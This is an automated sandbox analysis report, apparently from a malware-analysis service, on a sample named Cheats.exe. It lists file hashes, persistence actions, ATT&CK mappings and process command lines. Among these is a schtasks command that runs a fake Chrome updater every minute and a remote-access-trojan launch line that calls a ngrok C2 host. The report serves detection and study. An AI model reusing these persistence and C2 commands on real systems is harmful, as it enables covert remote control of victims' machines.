Analysis
-
max time kernel
21s -
max time network
20s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
29-06-2024 15:43
Static task
static1
Behavioral task
behavioral1
Sample
Cheats.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Cheats.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
Cheats.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
Cheats.exe
Resource
win11-20240611-en
General
-
Target
Cheats.exe
-
Size
1.8MB
-
MD5
4f40fe592b8c8dde38b0e56d1c987060
-
SHA1
73d386dddf6d9aa2ba7347b54d7adb370e35163e
-
SHA256
399350fa770109605394a96f46edd77f1b3895f8b1ea435c34240a0d40c10b76
-
SHA512
3c7ae1bc65ca98312e3798f5d41942208e7d3a0bff950ad262b7d63a2c46f485e16aa5e2427896e712ee38dac2815a8e8e6d3a8919a04ef21395adfec65d1e40
-
SSDEEP
24576:4HnYUXRQmcVNit/+nmGSbhn1s6zUwY4x2FiZlD+DnX7gSf:4HYUXGvbmGSbh1s69YbFifyjcSf
Malware Config
Signatures
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk Cheats.exe -
Executes dropped EXE 1 IoCs
pid Process 3680 RD-127.0.0.1_56923_485150.EXE -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\updater = "\"C:\\Program Files\\Chrome\\updater.exe\"" Cheats.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\updater = "\"C:\\Program Files\\Chrome\\updater.exe\"" Cheats.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
flow ioc 1 0.tcp.eu.ngrok.io -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Chrome\updater.exe Cheats.exe File opened for modification C:\Program Files\Chrome\updater.exe Cheats.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid Process 2824 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2352 schtasks.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4880 Cheats.exe Token: SeDebugPrivilege 2824 taskkill.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4880 wrote to memory of 2352 4880 Cheats.exe 73 PID 4880 wrote to memory of 2352 4880 Cheats.exe 73 PID 4880 wrote to memory of 3680 4880 Cheats.exe 78 PID 4880 wrote to memory of 3680 4880 Cheats.exe 78 PID 4880 wrote to memory of 3680 4880 Cheats.exe 78 PID 4880 wrote to memory of 2824 4880 Cheats.exe 79 PID 4880 wrote to memory of 2824 4880 Cheats.exe 79 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cheats.exe"C:\Users\Admin\AppData\Local\Temp\Cheats.exe"1⤵
- Drops startup file
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "updater" /tr "C:\Program Files\Chrome\updater.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\RD-127.0.0.1_56923_485150.EXE"C:\Users\Admin\AppData\Local\Temp\RD-127.0.0.1_56923_485150.EXE" 0.tcp.eu.ngrok.io<ZTPLG>18765<ZTPLG>127.0.0.1:56923<ZTPLG>|<'ZT_RAT_by7d87BgX8Q3'>|2⤵
- Executes dropped EXE
PID:3680
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /f /im RD-127.0.0.1_56923_485150.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
86KB
MD50d13c4f28e151a5fc8242b40b8f53f8b
SHA124fb8416d5b47a9326b61e0352b06830ff5f3814
SHA2569385f46f06cb900620b91e0f704df2af1efd44ed5b7d06b4f0b862f55f825bc8
SHA512279d5f7f2d74096dea8f8b5bf38faf18d9ce17e5e764e9d9a753d8b664412677d4c9dcd93b26549797ba2aedb4b26c7c64924def3aeba9ea7fe1c5a84ad63ea6